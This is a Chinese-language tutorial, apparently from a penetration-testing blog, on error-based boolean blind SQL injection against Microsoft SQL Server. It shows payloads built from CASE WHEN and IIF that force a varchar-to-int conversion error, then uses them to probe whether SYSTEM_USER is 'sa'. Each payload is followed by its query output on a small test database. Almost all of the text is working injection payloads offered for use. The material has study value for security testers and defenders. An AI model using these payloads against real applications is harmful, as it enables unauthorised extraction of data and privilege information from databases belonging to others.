0x01 前言
在注入的时候,你可能会遇到一种情况,那就是某个地方有注入
但是表里没有数据,导致你无法正常的进行布尔注入
那么所以此方法你就可以获得跟 mysql语句 case when 1 like 1 then 0 else 2*1e308 end 类似的效果
这里使用的方法是 两者数据类型不一致然后又进行比对时,导致发生错误,这样来强制显示出布尔的效果
0x02 测试数据
1> select * from article;
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)
# 测试表数据: users;
sql server> select * from users;
+----+--------------+----------+
| id | username | password |
+----+--------------+----------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
+----+--------------+----------+
2 rows in set (0.00 sec)
sql server> SELECT system_user;
+-----------------------+
| field1 |
+-----------------------+
| sa |
+-----------------------+
1 row in set (0.00 sec)
sql server> select db_name();
+-----------------------+
| field1 |
+-----------------------+
| test |
+-----------------------+
1 row in set (0.00 sec)
0x03 CASE 条件语句 例子一
SQL:select * from article WHERE id=1 and 1=(CASE WHEN 1=1 THEN 1 ELSE ‘x’ END)
# 对的情况
1> select * from article WHERE id=1 and 1=(CASE WHEN 1=1 THEN 1 ELSE 'x' END);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
SQL:select * from article WHERE id=1 and 1=(CASE WHEN 1=2 THEN 1 ELSE ‘x’ END);
# 错误的情况
1> select * from article WHERE id=1 and 1=(CASE WHEN 1=2 THEN 1 ELSE 'x' END);
2> go
22018 - [SQL Server]在将 varchar 值 'x' 转换成数据类型 int 时失败。
这样就可以达到强制布尔的结果了
0x04 CASE 条件语句 例子二
SQL:select * from article WHERE id=1 and 1=(CASE WHEN system_user like ‘%sa%’ THEN 1 ELSE ‘x’ END)
# 查询SYSTEM_USER 正确的情况
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = (
CASE
WHEN SYSTEM_USER LIKE '%sa%' THEN
1
ELSE
'x'
END
);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
SQL:select * from article WHERE id=1 and 1=(CASE WHEN system_user like ‘%aaaaa%’ THEN 1 ELSE ‘x’ END)
# 查询SYSTEM_USER 错误的情况
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = (
CASE
WHEN SYSTEM_USER LIKE '%aaaaa%' THEN
1
ELSE
'x'
END
);
2> go
22018 - [SQL Server]在将 varchar 值 'x' 转换成数据类型 int 时失败。
0x05 IIF 条件语句 例子一
SQL:select * from article WHERE id=1 and 1=IIF(1=1,1,’x’);
# 对的情况
1> select * from article WHERE id=1 and 1=IIF(1=1,1,'x');
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
SQL:select * from article WHERE id=1 and 1=IIF(1=2,1,’x’);
# 错误的情况
1> select * from article WHERE id=1 and 1=IIF(1=2,1,'x');
2> go
22018 - [SQL Server]在将 varchar 值 'x' 转换成数据类型 int 时失败。
0x06 IIF 条件语句 例子二
# 查询SYSTEM_USER 正确的情况
1> select * from article WHERE id=1 and 1=IIF(SYSTEM_USER LIKE '%sa%',1,'x');
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
# 查询SYSTEM_USER 错误的情况
1> select * from article WHERE id=1 and 1=IIF(SYSTEM_USER LIKE '%aaaa%',1,'x');
2> go
22018 - [SQL Server]在将 varchar 值 'x' 转换成数据类型 int 时失败。